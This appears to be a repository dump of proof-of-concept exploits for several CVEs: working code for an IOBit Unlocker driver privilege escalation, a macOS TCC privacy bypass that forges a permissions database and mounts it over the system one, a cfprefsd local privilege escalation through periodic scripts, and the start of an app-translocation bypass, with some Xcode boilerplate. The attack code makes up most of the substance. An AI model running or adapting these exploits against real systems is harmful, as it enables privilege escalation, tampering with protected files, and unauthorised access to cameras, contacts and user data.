| 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 368 | 369 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 436 | 437 | 438 | 439 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | Default 529 | 530 | 531 | 532 | 533 | 534 | 535 | Left to Right 536 | 537 | 538 | 539 | 540 | 541 | 542 | Right to Left 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | Default 554 | 555 | 556 | 557 | 558 | 559 | 560 | Left to Right 561 | 562 | 563 | 564 | 565 | 566 | 567 | Right to Left 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIconFile 10 | 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | $(PRODUCT_BUNDLE_PACKAGE_TYPE) 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleVersion 22 | 1 23 | LSMinimumSystemVersion 24 | $(MACOSX_DEPLOYMENT_TARGET) 25 | NSHumanReadableCopyright 26 | Copyright © 2019. csaba. All rights reserved. 27 | NSMainStoryboardFile 28 | Main 29 | NSPrincipalClass 30 | NSApplication 31 | NSSupportsAutomaticTermination 32 | 33 | NSSupportsSuddenTermination 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/PMCocoa.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : NSViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @implementation ViewController 12 | 13 | - (void)viewDidLoad { 14 | [super viewDidLoad]; 15 | 16 | // Do any additional setup after loading the view. 17 | } 18 | 19 | 20 | - (void)setRepresentedObject:(id)representedObject { 21 | [super setRepresentedObject:representedObject]; 22 | 23 | // Update the view, if already loaded. 24 | } 25 | 26 | 27 | @end 28 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | int main(int argc, const char * argv[]) { 12 | @autoreleasepool { 13 | // Setup code that might create autoreleased objects goes here. 14 | } 15 | return NSApplicationMain(argc, argv); 16 | } 17 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29009.5 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UnlockExploit", "UnlockExploit\UnlockExploit.vcxproj", "{BB74308A-2903-44D0-9BA9-D4459E4883DA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x64.ActiveCfg = Debug|x64 17 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x64.Build.0 = Debug|x64 18 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x86.Build.0 = Debug|Win32 20 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x64.ActiveCfg = Release|x64 21 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x64.Build.0 = Release|x64 22 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x86.ActiveCfg = Release|Win32 23 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {7E679E64-9B49-49C5-AF2C-64CC15BF1663} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.cpp: -------------------------------------------------------------------------------- 1 | // UnlockExploit.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | BOOL FileExists(LPCWSTR szPath) 9 | { 10 | DWORD dwAttrib = GetFileAttributesW(szPath); 11 | printf("[i] File exists status: 0x%08x\n", dwAttrib); 12 | return (dwAttrib != INVALID_FILE_ATTRIBUTES); 13 | } 14 | 15 | void ReadStringFromSTDIN(wchar_t * buffer) 16 | { 17 | printf("> "); 18 | fgetws((wchar_t*)buffer, 0x200, stdin); 19 | memset((LPVOID)((SIZE_T)buffer + (lstrlenW((LPCWSTR)buffer) * sizeof(WCHAR) - sizeof(WCHAR))), 0x00, sizeof(WCHAR)); //remove end of line character 20 | } 21 | 22 | int main(int argc, char* argv[]) { 23 | printf("[i] IOBit Unlocker Privilege Escalation PoC\n"); 24 | 25 | //open the driver 26 | HANDLE hDriver = CreateFileW(L"\\\\.\\IOBitUnlockerDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 27 | if (hDriver != INVALID_HANDLE_VALUE) 28 | { 29 | printf("[+] opened handle to the driver\n"); 30 | 31 | DWORD input_buffer_size = 0x1000; 32 | DWORD output_buffer_size = 0x1000; 33 | //allocate input buffer 34 | LPVOID input_buffer = VirtualAlloc(NULL, (SIZE_T)input_buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | if (input_buffer == NULL) 36 | { 37 | printf("[-] Unable to allocate memory for input buffer\n"); 38 | ExitProcess(-1); 39 | } 40 | printf("[+] Allocated input memory buffer at: 0x%Ix\n", (UINT64)input_buffer); 41 | 42 | //allocate output buffer 43 | LPVOID output_buffer = VirtualAlloc(NULL, (SIZE_T)output_buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 44 | if (output_buffer == NULL) 45 | { 46 | printf("[-] Unable to allocate memory for output buffer\n"); 47 | ExitProcess(-1); 48 | } 49 | printf("[+] Allocated output buffer memory at: 0x%Ix\n", (UINT64)output_buffer); 50 | 51 | // Clear memory area 52 | memset(input_buffer, 0x00, input_buffer_size); 53 | memset(output_buffer, 0x00, output_buffer_size); 54 | 55 | printf("[i] Enter full path for the file to unlock. Eg: C:\\Windows\\System32\\cmd.exe\n"); 56 | ReadStringFromSTDIN((wchar_t*)input_buffer); 57 | wprintf(L"Fileto be checked: %s\n", (wchar_t *)input_buffer); 58 | 59 | if (!FileExists((LPCWSTR)input_buffer)) { 60 | printf("[-] This file doesn't exists\n"); 61 | ExitProcess(-1); 62 | } 63 | //print options 64 | printf("[+] File found!\n"); 65 | printf("[i] Choose an option:\n"); 66 | printf("1 - INFO\n"); 67 | printf("2 - Unlock\n"); 68 | printf("3 - Unlock & Delete\n"); 69 | printf("4 - Unlock & Rename\n"); 70 | printf("5 - Unlock & Move\n"); 71 | printf("6 - Unlock & Copy\n"); 72 | 73 | boolean valid = false; 74 | int option = 0; 75 | while (!valid) 76 | { 77 | printf("> "); 78 | int result = scanf_s("%d", &option); 79 | if (result == EOF) { 80 | printf("[-] Invalid input\n"); 81 | continue; 82 | } 83 | if (result == 0) { 84 | while (fgetc(stdin) != '\n') // Read until a newline is found 85 | ; 86 | printf("[-] Invalid input\n"); 87 | continue; 88 | } 89 | 90 | if (option > 0 && option < 7) 91 | { 92 | valid = true; 93 | while (fgetc(stdin) != '\n') // Read until a newline is found, if we don't do this it will mess up code later 94 | ; 95 | } 96 | else 97 | { 98 | printf("[-] Invalid number, enter something between 1 and 6\n"); 99 | } 100 | } 101 | 102 | DWORD dwIoctl_info = 0x222128; 103 | DWORD dwIoctl_action = 0x222124; 104 | DWORD dwBytesOut = 0; 105 | switch (option) 106 | { 107 | case 1: 108 | { 109 | DeviceIoControl(hDriver, dwIoctl_info, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 110 | wprintf(L"[i] File info: %s\n", (wchar_t*)output_buffer); 111 | break; 112 | } 113 | case 2: 114 | { 115 | ((byte*)input_buffer)[0x424] = 0x3; 116 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 117 | break; 118 | } 119 | case 3: 120 | { 121 | ((byte*)input_buffer)[0x420] = 0x1; 122 | ((byte*)input_buffer)[0x424] = 0x3; 123 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 124 | break; 125 | } 126 | case 4: //this is not working id the user doesn't have rights to access the file 127 | { 128 | ((byte*)input_buffer)[0x420] = 0x2; 129 | ((byte*)input_buffer)[0x424] = 0x3; 130 | printf("[i] Enter new filename:\n"); 131 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 132 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 133 | break; 134 | } 135 | case 5: 136 | { 137 | ((byte*)input_buffer)[0x420] = 0x3; 138 | ((byte*)input_buffer)[0x424] = 0x3; 139 | printf("[i] Enter new path (move operation):\n"); 140 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 141 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 142 | break; 143 | } 144 | case 6: 145 | { 146 | ((byte*)input_buffer)[0x420] = 0x4; 147 | ((byte*)input_buffer)[0x424] = 0x3; 148 | printf("[i] Enter new path (copy operation):\n"); 149 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 150 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 151 | break; 152 | } 153 | default: 154 | break; 155 | } 156 | } 157 | else { 158 | printf("[-] Couldn't open the driver\n"); 159 | ExitProcess(-1); 160 | } 161 | CloseHandle(hDriver); 162 | ExitProcess(0); 163 | } 164 | 165 | 166 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {BB74308A-2903-44D0-9BA9-D4459E4883DA} 24 | Win32Proj 25 | UnlockExploit 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | 103 | 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | 118 | 119 | Level3 120 | MaxSpeed 121 | true 122 | true 123 | true 124 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | 137 | 138 | Level3 139 | MaxSpeed 140 | true 141 | true 142 | true 143 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 144 | true 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/x64/Release/UnlockExploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2020-14974_iobit_unlocker/UnlockExploit/x64/Release/UnlockExploit.exe -------------------------------------------------------------------------------- /cve-2021-1784_tcc_bypass_hdiutil/cve-2021-1784_tcc_bypass_hdiutil.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2021-1784_tcc_bypass_hdiutil/cve-2021-1784_tcc_bypass_hdiutil.mov -------------------------------------------------------------------------------- /cve-2021-1784_tcc_bypass_hdiutil/tccbypass.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | tcc_dump = """ 4 | PRAGMA foreign_keys=OFF; 5 | BEGIN TRANSACTION; 6 | CREATE TABLE admin (key TEXT PRIMARY KEY NOT NULL, value INTEGER NOT NULL); 7 | INSERT INTO admin VALUES('version',19); 8 | CREATE TABLE policies ( id INTEGER NOT NULL PRIMARY KEY, bundle_id TEXT NOT NULL, uuid TEXT NOT NULL, display TEXT NOT NULL, UNIQUE (bundle_id, uuid)); 9 | CREATE TABLE active_policy ( client TEXT NOT NULL, client_type INTEGER NOT NULL, policy_id INTEGER NOT NULL, PRIMARY KEY (client, client_type), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE); 10 | CREATE TABLE access_overrides ( service TEXT NOT NULL PRIMARY KEY); 11 | CREATE TABLE expired ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, csreq BLOB, last_modified INTEGER NOT NULL , expired_at INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type)); 12 | CREATE TABLE IF NOT EXISTS "access" ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL, auth_version INTEGER NOT NULL, csreq BLOB, policy_id INTEGER, indirect_object_identifier_type INTEGER, indirect_object_identifier TEXT NOT NULL DEFAULT 'UNUSED', indirect_object_code_identity BLOB, flags INTEGER, last_modified INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type, indirect_object_identifier), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE); 13 | INSERT INTO access VALUES('kTCCServiceSystemPolicyDownloadsFolder','/usr/bin/osascript',1,2,0,1,X'fade0c000000003000000001000000060000000200000013636f6d2e6170706c652e6f73617363726970740000000003',NULL,NULL,'UNUSED',NULL,NULL,1570821926); 14 | INSERT INTO access VALUES('kTCCServiceSystemPolicyDocumentsFolder','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,0,1578822650); 15 | INSERT INTO access VALUES('kTCCServicePhotos','com.apple.Terminal',0,2,0,1,NULL,NULL,NULL,'UNUSED',NULL,0,1579641459); 16 | INSERT INTO access VALUES('kTCCServiceSystemPolicyNetworkVolumes','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1585236401); 17 | INSERT INTO access VALUES('kTCCServiceSystemPolicyRemovableVolumes','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1585236548); 18 | INSERT INTO access VALUES('kTCCServiceSystemPolicyDownloadsFolder','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1590157084); 19 | INSERT INTO access VALUES('kTCCServiceCamera','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1590158855); 20 | INSERT INTO access VALUES('kTCCServiceLiverpool','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,0,1602916689); 21 | INSERT INTO access VALUES('kTCCServiceAddressBook','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073969); 22 | INSERT INTO access VALUES('kTCCServiceCalendar','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073972); 23 | INSERT INTO access VALUES('kTCCServiceReminders','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073976); 24 | INSERT INTO access VALUES('kTCCServiceSystemPolicyDesktopFolder','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606771281); 25 | INSERT INTO access VALUES('kTCCServiceAppleEvents','/usr/bin/osascript',1,2,4,1,X'fade0c000000003000000001000000060000000200000013636f6d2e6170706c652e6f73617363726970740000000003',NULL,0,'com.apple.finder',X'fade0c000000002c00000001000000060000000200000010636f6d2e6170706c652e66696e64657200000003',0,1606772849); 26 | INSERT INTO access VALUES('kTCCServiceAppleEvents','com.apple.Terminal',0,2,3,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,0,'com.apple.finder',X'fade0c000000002c00000001000000060000000200000010636f6d2e6170706c652e66696e64657200000003',NULL,1606772944); 27 | CREATE INDEX active_policy_id ON active_policy(policy_id); 28 | COMMIT; 29 | """ 30 | 31 | def create_tcc_db(): 32 | f = open('/tmp/tccdump.sql','w') 33 | f.write(tcc_dump) 34 | f.close() 35 | os.system("sqlite3 /tmp/TCC.db < /tmp/tccdump.sql") 36 | 37 | def create_dmg(): 38 | os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null") 39 | os.system("mkdir /tmp/mnt") 40 | os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null") 41 | os.system("cp /tmp/TCC.db /tmp/mnt/TCC.db") 42 | os.system("hdiutil detach /tmp/mnt 1>/dev/null") 43 | 44 | def mount_trick(): 45 | os.system("hdiutil attach -owners off -mountpoint Library/Application\ Support/com.apple.TCC /tmp/tmp.dmg 1>/dev/null") 46 | 47 | def restart_tcc(): 48 | os.system("launchctl stop com.apple.tccd && launchctl start com.apple.tccd") 49 | 50 | def main(): 51 | print("[i] Creating new TCC database") 52 | create_tcc_db() 53 | print("[i] Creating and prepare DMG file") 54 | create_dmg() 55 | print("[i] Mount DMG over com.apple.TCC") 56 | mount_trick() 57 | print("[i] Restart TCC") 58 | restart_tcc() 59 | print("[i] Enjoy access :-)") 60 | 61 | 62 | main() -------------------------------------------------------------------------------- /cve-2021-1815_macos_cfprefsd_lpe/prefs.m: -------------------------------------------------------------------------------- 1 | #import 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | int main() { 16 | //CFPreferencesSetAppValue(@"Label", @"You know what should be put here", [(id)NSHomeDirectory() stringByAppendingPathComponent:@"Library/LaunchAgents/evil.plist"]); 17 | 18 | //char *serviceName = "com.apple.cfprefsd.agent"; 19 | char *serviceName = "com.apple.cfprefsd.daemon"; 20 | int status = 0; 21 | 22 | xpc_connection_t conn; 23 | xpc_object_t msg; 24 | 25 | conn = xpc_connection_create_mach_service(serviceName, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); 26 | if (conn == NULL) { 27 | perror("xpc_connection_create_mach_service"); 28 | } 29 | 30 | xpc_connection_set_event_handler(conn, ^(xpc_object_t obj) { 31 | perror("xpc_connection_set_event_handler"); 32 | }); 33 | 34 | xpc_connection_resume(conn); 35 | 36 | msg = xpc_dictionary_create(NULL, NULL, 0); 37 | xpc_dictionary_set_int64(msg, "CFPreferencesOperation", 1); 38 | xpc_dictionary_set_bool(msg, "CFPreferencesUseCorrectOwner", true); 39 | 40 | //create as root 41 | //xpc_dictionary_set_string(msg, "CFPreferencesUser", "root"); 42 | 43 | //create as user 44 | xpc_dictionary_set_string(msg, "CFPreferencesUser", "kCFPreferencesCurrentUser"); 45 | 46 | xpc_dictionary_set_string(msg, "CFPreferencesHostBundleIdentifier", "prefs"); 47 | //char writable_subpath[0x1000]; 48 | //sprintf(writable_subpath, "%s", "/usr/local/etc/periodic/daily/a.plist"); 49 | xpc_dictionary_set_string(msg, "CFPreferencesDomain", "/usr/local/etc/periodic/daily/a.plist"); 50 | //xpc_dictionary_set_bool(msg, "CFPreferencesAvoidCache", true); 51 | xpc_dictionary_set_string(msg, "Key", "key"); 52 | xpc_dictionary_set_string(msg, "Value", "value"); 53 | 54 | xpc_connection_send_message(conn, msg); 55 | usleep(1000000); 56 | 57 | NSString* script = @"touch /Library/privesc.txt\n"; 58 | NSError *error; 59 | BOOL succeed = [script writeToFile:@"/usr/local/etc/periodic/daily/111.lpe" atomically:YES encoding:NSUTF8StringEncoding error:&error]; 60 | if (!succeed){ 61 | printf("Couldn't create periodic script :(\n"); 62 | } 63 | 64 | char mode[] = "0777"; 65 | int i; 66 | i = strtol(mode, 0, 8); 67 | chmod("/usr/local/etc/periodic/daily/111.lpe",i); 68 | } 69 | -------------------------------------------------------------------------------- /cve-2021-30782_tcc_apptranslocation/xpctrans.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, const char **argv) { 6 | 7 | 8 | //getenv 9 | char *homedir = getenv("HOME"); 10 | char *tmpdir = getenv("TMPDIR"); 11 | 12 | //create paths 13 | char original[MAXPATHLEN]; 14 | char destination[MAXPATHLEN]; 15 | snprintf(original, sizeof(original), "%s%s", homedir, "/Library"); 16 | snprintf(destination, sizeof(destination), "%s%s%s", "/private", 